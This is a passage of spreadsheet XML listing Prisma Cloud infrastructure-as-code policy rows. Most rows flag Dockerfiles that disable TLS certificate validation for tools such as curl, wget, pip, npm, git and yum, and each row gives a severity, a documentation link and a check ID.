      <c r="D1297" t="inlineStr"/>
      <c r="E1297" t="inlineStr"/>
      <c r="F1297" t="inlineStr"/>
      <c r="G1297" t="b">
        <v>1</v>
      </c>
      <c r="H12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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1297" t="inlineStr">
        <is>
          <t>IaC:Networking</t>
        </is>
      </c>
      <c r="K1297" t="inlineStr">
        <is>
          <t>Operation objects for PUT, POST, and PATCH operations do not have a 'consumes' field defined</t>
        </is>
      </c>
      <c r="L1297" t="inlineStr"/>
      <c r="M1297" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1297" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1297" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1297" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1297" t="inlineStr"/>
      <c r="R1297" t="inlineStr"/>
      <c r="S1297" t="inlineStr"/>
      <c r="T1297" t="b">
        <v>0</v>
      </c>
      <c r="U1297" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1297" t="inlineStr">
        <is>
          <t>IaC:Networking</t>
        </is>
      </c>
      <c r="W1297" t="inlineStr">
        <is>
          <t>Ensure that operation objects have 'consumes' field defined for PUT, POST and PATCH operations - version 2.0 files</t>
        </is>
      </c>
      <c r="X1297" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/api-policies/openapi-policies/bc-openapi-17</t>
        </is>
      </c>
      <c r="Y1297" t="inlineStr"/>
      <c r="Z1297" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA1297" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1297" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1297" t="inlineStr">
        <is>
          <t>CKV_OPENAPI_17</t>
        </is>
      </c>
      <c r="AD1297" t="b">
        <v>1</v>
      </c>
      <c r="AE1297" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1297" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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7" t="inlineStr">
        <is>
          <t>9b9d727b-f65a-4fd9-8f39-0ed3c2e0a206</t>
        </is>
      </c>
      <c r="AI1297" t="inlineStr"/>
      <c r="AJ1297" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1297" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1298">
      <c r="A1298" t="inlineStr"/>
      <c r="B1298" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1298" s="2" t="inlineStr"/>
      <c r="D1298" t="inlineStr"/>
      <c r="E1298" t="inlineStr"/>
      <c r="F1298" t="inlineStr"/>
      <c r="G1298" t="b">
        <v>1</v>
      </c>
      <c r="H12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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1298" t="inlineStr">
        <is>
          <t>IaC:Networking:</t>
        </is>
      </c>
      <c r="K1298" t="inlineStr">
        <is>
          <t>Dockerfile certificate validation is disabled with the PYTHONHTTPSVERIFY environment variable</t>
        </is>
      </c>
      <c r="L1298" t="inlineStr"/>
      <c r="M1298" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1298" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1298" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1298" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1298" t="inlineStr"/>
      <c r="R1298" t="inlineStr"/>
      <c r="S1298" t="inlineStr"/>
      <c r="T1298" t="b">
        <v>0</v>
      </c>
      <c r="U1298" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1298" t="inlineStr">
        <is>
          <t>IaC:Networking:</t>
        </is>
      </c>
      <c r="W1298" t="inlineStr">
        <is>
          <t>Ensure that certificate validation isn't disabled with the PYTHONHTTPSVERIFY environmnet variable</t>
        </is>
      </c>
      <c r="X1298" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-PYTHONHTTPSVERIFY-secure</t>
        </is>
      </c>
      <c r="Y1298" t="inlineStr"/>
      <c r="Z1298" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA1298" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1298" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1298" t="inlineStr">
        <is>
          <t>CKV2_DOCKER_5</t>
        </is>
      </c>
      <c r="AD1298" t="b">
        <v>1</v>
      </c>
      <c r="AE1298" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1298" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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8" t="inlineStr">
        <is>
          <t>5bb3f82d-34ef-46db-9414-cc10318bc53d</t>
        </is>
      </c>
      <c r="AI1298" t="inlineStr"/>
      <c r="AJ1298" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1298" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1299">
      <c r="A1299" t="inlineStr"/>
      <c r="B1299" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1299" s="2" t="inlineStr"/>
      <c r="D1299" t="inlineStr"/>
      <c r="E1299" t="inlineStr"/>
      <c r="F1299" t="inlineStr"/>
      <c r="G1299" t="b">
        <v>1</v>
      </c>
      <c r="H12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299" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1299" t="inlineStr">
        <is>
          <t>IaC:Networking:</t>
        </is>
      </c>
      <c r="K1299" t="inlineStr">
        <is>
          <t>Dockerfile sets NPM configuration to disable strict SSL</t>
        </is>
      </c>
      <c r="L1299" t="inlineStr"/>
      <c r="M1299" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1299" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1299" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1299" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1299" t="inlineStr"/>
      <c r="R1299" t="inlineStr"/>
      <c r="S1299" t="inlineStr"/>
      <c r="T1299" t="b">
        <v>0</v>
      </c>
      <c r="U1299" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1299" t="inlineStr">
        <is>
          <t>IaC:Networking:</t>
        </is>
      </c>
      <c r="W1299" t="inlineStr">
        <is>
          <t>Ensure that certificate validation isn't disabled for npm or yarn by setting the option strict-ssl to false</t>
        </is>
      </c>
      <c r="X1299" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-npm-strict-ssl2</t>
        </is>
      </c>
      <c r="Y1299" t="inlineStr"/>
      <c r="Z1299" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA1299" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1299" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1299" t="inlineStr">
        <is>
          <t>CKV2_DOCKER_13</t>
        </is>
      </c>
      <c r="AD1299" t="b">
        <v>1</v>
      </c>
      <c r="AE1299" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1299" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG12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299" t="inlineStr">
        <is>
          <t>0989dd53-acef-4c2c-bb13-e88560104590</t>
        </is>
      </c>
      <c r="AI1299" t="inlineStr"/>
      <c r="AJ1299" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1299" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1300">
      <c r="A1300" t="inlineStr"/>
      <c r="B1300" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1300" s="2" t="inlineStr"/>
      <c r="D1300" t="inlineStr"/>
      <c r="E1300" t="inlineStr"/>
      <c r="F1300" t="inlineStr"/>
      <c r="G1300" t="b">
        <v>1</v>
      </c>
      <c r="H13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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1300" t="inlineStr">
        <is>
          <t>IaC:Networking:</t>
        </is>
      </c>
      <c r="K1300" t="inlineStr">
        <is>
          <t>Dockerfile configuration disables strict SSL for NPM</t>
        </is>
      </c>
      <c r="L1300" t="inlineStr"/>
      <c r="M1300" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1300" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1300" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1300" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1300" t="inlineStr"/>
      <c r="R1300" t="inlineStr"/>
      <c r="S1300" t="inlineStr"/>
      <c r="T1300" t="b">
        <v>0</v>
      </c>
      <c r="U1300" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1300" t="inlineStr">
        <is>
          <t>IaC:Networking:</t>
        </is>
      </c>
      <c r="W1300" t="inlineStr">
        <is>
          <t>Ensure that certificate validation isn't disabled for npm via the 'NPM_CONFIG_STRICT_SSL' environmnet variable</t>
        </is>
      </c>
      <c r="X1300" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-npm-strict-ssl</t>
        </is>
      </c>
      <c r="Y1300" t="inlineStr"/>
      <c r="Z1300" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA1300" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1300" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1300" t="inlineStr">
        <is>
          <t>CKV2_DOCKER_12</t>
        </is>
      </c>
      <c r="AD1300" t="b">
        <v>1</v>
      </c>
      <c r="AE1300" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1300" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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0" t="inlineStr">
        <is>
          <t>0af43489-24b7-4498-a413-0a2ab7c82553</t>
        </is>
      </c>
      <c r="AI1300" t="inlineStr"/>
      <c r="AJ1300" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1300" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1301">
      <c r="A1301" t="inlineStr"/>
      <c r="B1301" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1301" s="2" t="inlineStr"/>
      <c r="D1301" t="inlineStr"/>
      <c r="E1301" t="inlineStr"/>
      <c r="F1301" t="inlineStr"/>
      <c r="G1301" t="b">
        <v>1</v>
      </c>
      <c r="H13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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1301" t="inlineStr">
        <is>
          <t>IaC:Networking:</t>
        </is>
      </c>
      <c r="K1301" t="inlineStr">
        <is>
          <t>Dockerfile certificate validation is disabled with wget</t>
        </is>
      </c>
      <c r="L1301" t="inlineStr"/>
      <c r="M1301" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1301" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1301" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1301" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1301" t="inlineStr"/>
      <c r="R1301" t="inlineStr"/>
      <c r="S1301" t="inlineStr"/>
      <c r="T1301" t="b">
        <v>0</v>
      </c>
      <c r="U1301" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1301" t="inlineStr">
        <is>
          <t>IaC:Networking:</t>
        </is>
      </c>
      <c r="W1301" t="inlineStr">
        <is>
          <t>Ensure that certificate validation isn't disabled with wget</t>
        </is>
      </c>
      <c r="X1301" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-wget-secure</t>
        </is>
      </c>
      <c r="Y1301" t="inlineStr"/>
      <c r="Z1301" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA1301" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1301" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1301" t="inlineStr">
        <is>
          <t>CKV2_DOCKER_3</t>
        </is>
      </c>
      <c r="AD1301" t="b">
        <v>1</v>
      </c>
      <c r="AE1301" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1301" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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1" t="inlineStr">
        <is>
          <t>17ba4ede-4d0c-4046-a170-90895f93fc13</t>
        </is>
      </c>
      <c r="AI1301" t="inlineStr"/>
      <c r="AJ1301" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1301" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1302">
      <c r="A1302" t="inlineStr"/>
      <c r="B1302" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1302" s="2" t="inlineStr"/>
      <c r="D1302" t="inlineStr"/>
      <c r="E1302" t="inlineStr"/>
      <c r="F1302" t="inlineStr"/>
      <c r="G1302" t="b">
        <v>1</v>
      </c>
      <c r="H13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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1302" t="inlineStr">
        <is>
          <t>IaC:Networking:</t>
        </is>
      </c>
      <c r="K1302" t="inlineStr">
        <is>
          <t>Dockerfile certificate validation is disabled with curl</t>
        </is>
      </c>
      <c r="L1302" t="inlineStr"/>
      <c r="M1302" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1302" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1302" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1302" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1302" t="inlineStr"/>
      <c r="R1302" t="inlineStr"/>
      <c r="S1302" t="inlineStr"/>
      <c r="T1302" t="b">
        <v>0</v>
      </c>
      <c r="U1302" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1302" t="inlineStr">
        <is>
          <t>IaC:Networking:</t>
        </is>
      </c>
      <c r="W1302" t="inlineStr">
        <is>
          <t>Ensure that certificate validation isn't disabled with curl</t>
        </is>
      </c>
      <c r="X1302" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-curl-secure</t>
        </is>
      </c>
      <c r="Y1302" t="inlineStr"/>
      <c r="Z1302" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA1302" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1302" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1302" t="inlineStr">
        <is>
          <t>CKV2_DOCKER_2</t>
        </is>
      </c>
      <c r="AD1302" t="b">
        <v>1</v>
      </c>
      <c r="AE1302" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1302" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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2" t="inlineStr">
        <is>
          <t>ed24003d-5c3e-4bfc-8188-ac86c802b173</t>
        </is>
      </c>
      <c r="AI1302" t="inlineStr"/>
      <c r="AJ1302" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1302" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1303">
      <c r="A1303" t="inlineStr"/>
      <c r="B1303" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1303" s="2" t="inlineStr"/>
      <c r="D1303" t="inlineStr"/>
      <c r="E1303" t="inlineStr"/>
      <c r="F1303" t="inlineStr"/>
      <c r="G1303" t="b">
        <v>1</v>
      </c>
      <c r="H13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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1303" t="inlineStr">
        <is>
          <t>IaC:Networking:</t>
        </is>
      </c>
      <c r="K1303" t="inlineStr">
        <is>
          <t>Dockerfile configures GIT to disable SSL verification</t>
        </is>
      </c>
      <c r="L1303" t="inlineStr"/>
      <c r="M1303" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1303" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1303" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1303" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1303" t="inlineStr"/>
      <c r="R1303" t="inlineStr"/>
      <c r="S1303" t="inlineStr"/>
      <c r="T1303" t="b">
        <v>0</v>
      </c>
      <c r="U1303" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1303" t="inlineStr">
        <is>
          <t>IaC:Networking:</t>
        </is>
      </c>
      <c r="W1303" t="inlineStr">
        <is>
          <t>Ensure that certificate validation isn't disabled for git by setting the environment variable 'GIT_SSL_NO_VERIFY' to any value</t>
        </is>
      </c>
      <c r="X1303" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-git-ssl</t>
        </is>
      </c>
      <c r="Y1303" t="inlineStr"/>
      <c r="Z1303" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA1303" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1303" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1303" t="inlineStr">
        <is>
          <t>CKV2_DOCKER_14</t>
        </is>
      </c>
      <c r="AD1303" t="b">
        <v>1</v>
      </c>
      <c r="AE1303" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1303" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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3" t="inlineStr">
        <is>
          <t>d7e4ee02-a422-46f9-ad82-c05e58f1a89a</t>
        </is>
      </c>
      <c r="AI1303" t="inlineStr"/>
      <c r="AJ1303" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1303" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1304">
      <c r="A1304" t="inlineStr"/>
      <c r="B1304" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1304" s="2" t="inlineStr"/>
      <c r="D1304" t="inlineStr"/>
      <c r="E1304" t="inlineStr"/>
      <c r="F1304" t="inlineStr"/>
      <c r="G1304" t="b">
        <v>1</v>
      </c>
      <c r="H13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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1304" t="inlineStr">
        <is>
          <t>IaC:Networking:</t>
        </is>
      </c>
      <c r="K1304" t="inlineStr">
        <is>
          <t>Dockerfile Node.js certificate validation is disabled with the NODE_TLS_REJECT_UNAUTHORIZED environment variable</t>
        </is>
      </c>
      <c r="L1304" t="inlineStr"/>
      <c r="M1304" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1304" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1304" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1304" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1304" t="inlineStr"/>
      <c r="R1304" t="inlineStr"/>
      <c r="S1304" t="inlineStr"/>
      <c r="T1304" t="b">
        <v>0</v>
      </c>
      <c r="U1304" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1304" t="inlineStr">
        <is>
          <t>IaC:Networking:</t>
        </is>
      </c>
      <c r="W1304" t="inlineStr">
        <is>
          <t>Ensure that certificate validation isn't disabled with the NODE_TLS_REJECT_UNAUTHORIZED environmnet variable</t>
        </is>
      </c>
      <c r="X1304" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-node-tls-secure</t>
        </is>
      </c>
      <c r="Y1304" t="inlineStr"/>
      <c r="Z1304" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA1304" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1304" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1304" t="inlineStr">
        <is>
          <t>CKV2_DOCKER_6</t>
        </is>
      </c>
      <c r="AD1304" t="b">
        <v>1</v>
      </c>
      <c r="AE1304" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1304" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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4" t="inlineStr">
        <is>
          <t>6d10d320-0324-4e22-aa7f-d632718b72a2</t>
        </is>
      </c>
      <c r="AI1304" t="inlineStr"/>
      <c r="AJ1304" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1304" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1305">
      <c r="A1305" t="inlineStr"/>
      <c r="B1305" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1305" s="2" t="inlineStr"/>
      <c r="D1305" t="inlineStr"/>
      <c r="E1305" t="inlineStr"/>
      <c r="F1305" t="inlineStr"/>
      <c r="G1305" t="b">
        <v>1</v>
      </c>
      <c r="H13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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1305" t="inlineStr">
        <is>
          <t>IaC:Networking:</t>
        </is>
      </c>
      <c r="K1305" t="inlineStr">
        <is>
          <t>Dockerfile sets YUM configuration to disable SSL verification</t>
        </is>
      </c>
      <c r="L1305" t="inlineStr"/>
      <c r="M1305" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1305" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1305" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1305" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1305" t="inlineStr"/>
      <c r="R1305" t="inlineStr"/>
      <c r="S1305" t="inlineStr"/>
      <c r="T1305" t="b">
        <v>0</v>
      </c>
      <c r="U1305" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1305" t="inlineStr">
        <is>
          <t>IaC:Networking:</t>
        </is>
      </c>
      <c r="W1305" t="inlineStr">
        <is>
          <t>Ensure that the yum and dnf package managers are not configured to disable SSL certificate validation via the 'sslverify' configuration option</t>
        </is>
      </c>
      <c r="X1305" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-yum-ssl</t>
        </is>
      </c>
      <c r="Y1305" t="inlineStr"/>
      <c r="Z1305" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA1305" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1305" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1305" t="inlineStr">
        <is>
          <t>CKV2_DOCKER_15</t>
        </is>
      </c>
      <c r="AD1305" t="b">
        <v>1</v>
      </c>
      <c r="AE1305" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1305" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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5" t="inlineStr">
        <is>
          <t>2dbf44db-cf61-4b1f-8728-df525f1e39a4</t>
        </is>
      </c>
      <c r="AI1305" t="inlineStr"/>
      <c r="AJ1305" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1305" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1306">
      <c r="A1306" t="inlineStr"/>
      <c r="B1306" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1306" s="2" t="inlineStr"/>
      <c r="D1306" t="inlineStr"/>
      <c r="E1306" t="inlineStr"/>
      <c r="F1306" t="inlineStr"/>
      <c r="G1306" t="b">
        <v>1</v>
      </c>
      <c r="H13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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J1306" t="inlineStr">
        <is>
          <t>IaC:Networking:</t>
        </is>
      </c>
      <c r="K1306" t="inlineStr">
        <is>
          <t>Dockerfile certificate validation is disabled with the pip '--trusted-host' option</t>
        </is>
      </c>
      <c r="L1306" t="inlineStr"/>
      <c r="M1306" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1306" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1306" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1306" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1306" t="inlineStr"/>
      <c r="R1306" t="inlineStr"/>
      <c r="S1306" t="inlineStr"/>
      <c r="T1306" t="b">
        <v>0</v>
      </c>
      <c r="U1306" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1306" t="inlineStr">
        <is>
          <t>IaC:Networking:</t>
        </is>
      </c>
      <c r="W1306" t="inlineStr">
        <is>
          <t>Ensure that certificate validation isn't disabled with the pip '--trusted-host' option</t>
        </is>
      </c>
      <c r="X1306" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-pip-secure</t>
        </is>
      </c>
      <c r="Y1306" t="inlineStr"/>
      <c r="Z1306" t="inlineStr">
        <is>
          <t>{"category":"Networking","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA1306" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1306" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1306" t="inlineStr">
        <is>
          <t>CKV2_DOCKER_4</t>
        </is>
      </c>
      <c r="AD1306" t="b">
        <v>1</v>
      </c>
      <c r="AE1306" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1306" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG13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6" t="inlineStr">
        <is>
          <t>1837455a-4c58-4f3c-bf4b-8dddf10e94f6</t>
        </is>
      </c>
      <c r="AI1306" t="inlineStr"/>
      <c r="AJ1306" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1306" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1307">
      <c r="A1307" t="inlineStr"/>
      <c r="B1307" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1307" s="2" t="inlineStr"/>
      <c r="D1307" t="inlineStr"/>
      <c r="E1307" t="inlineStr"/>
      <c r="F1307" t="inlineStr"/>
      <c r="G1307" t="b">
        <v>1</v>
      </c>
      <c r="H13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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1307" t="inlineStr">
        <is>
          <t>IaC:Networking:AWS::WAFv2::WebACL,aws-wafv2</t>
        </is>
      </c>
      <c r="K1307" t="inlineStr">
        <is>
          <t>WAF enables message lookup in Log4j2</t>
        </is>
      </c>
